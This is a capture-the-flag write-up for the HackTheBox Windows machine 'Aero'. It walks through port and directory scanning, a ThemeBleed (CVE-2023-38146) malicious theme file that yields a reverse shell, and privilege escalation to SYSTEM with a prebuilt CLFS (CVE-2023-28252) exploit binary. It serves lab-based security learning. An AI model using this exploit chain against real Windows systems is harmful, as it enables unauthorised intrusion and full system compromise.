Box Info
  • Name:Aero
  • OS: Windows
  • Difficulty: Medium
  • IP: 10.10.11.237
Aero box image

Setup

mkdir -p ~/ctf/HackTheBox/aero/scans; cd ~/ctf/HackTheBox/aero

IP Address: 10.10.11.237

echo "10.10.11.237 aero.htb" | sudo tee -a /etc/hosts

10.10.11.237 aero.htb

Enumeration

nmap -sC -sV -Pn -p- aero.htb -oN scans/nmap -vv

nmap -sC -sV -p- -T5 -vv --min-rate 2500 -oN scans/nmap_2 aero.htb

# nmap findings
PORT     STATE SERVICE    REASON          VERSION
80/tcp   open  http       syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Aero Theme Hub
|_http-server-header: Microsoft-IIS/10.0
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
7680/tcp open  pando-pub? syn-ack ttl 127
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

ffuf -r -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt:ff -u http://aero.htb/ff -o scans/ffuf_dir

# FFUF dir search findings 
Home                    [Status: 200, Size: 11650, Words: 3468, Lines: 187, Duration: 311ms]
upload                  [Status: 405, Size: 0, Words: 1, Lines: 1, Duration: 75ms]

We see there are two endpoints here on port 80 website, on the home page we see a upload option

Pasted_image_20250730194701.png

when we try to upload we see the supported formats are .theme & .themepack.

Pasted_image_20250730194745.png

When searching on google we come across an article for CVE-2023-38146: Themebleed

Using the Exploit provided in this github, we can generate custom .theme & .themepack files with with the PACKTHEM_VERSION set to 999, then as vulnerability describes we will pass the file integrity with a unmodified msstyles files and then load our malicious dll Aero.msstyles_vrf_evil.dll to execute arbitrary commands.

Pasted_image_20250731095012.png

Pasted_image_20250731095040.png

We get SMB connection and our modified dll is accessed Pasted_image_20250731095142.png

We get a reverse shell on our netcat listener: Pasted_image_20250731095222.png

User Flag

Location:C:\Users\sam.emerson\Desktop | Flag:

Privilege Escalation

In the Documents folder we find two files one pdf and one powershell script.

The watchdog.ps1 is a script which checks for upload theme files and executes them.

Pasted_image_20250731114429.png

By using the Impacket smb server we open a smb share which we connect to from the box shell and transfer the pdf file.

Pasted_image_20250731114756.png

The PDF summaries about the CVE-2023-28252 which targets common log file system.

We get to see a already compiled binary to exploit this on this github repo.

Pasted_image_20250731114910.png

Using the binary and command whoami:

&"C:\Users\sam.emerson\Documents\clfs.exe" "whoami"

Pasted_image_20250731122438.png

When we run the binary with powershell we get a shell with ntauthority\system:

Pasted_image_20250731122716.png

Root Flag

Location: C:\Users\Administrator\Desktop\root.txt | Flag: cb1e0fe8ee7aec3863a458a1937c069e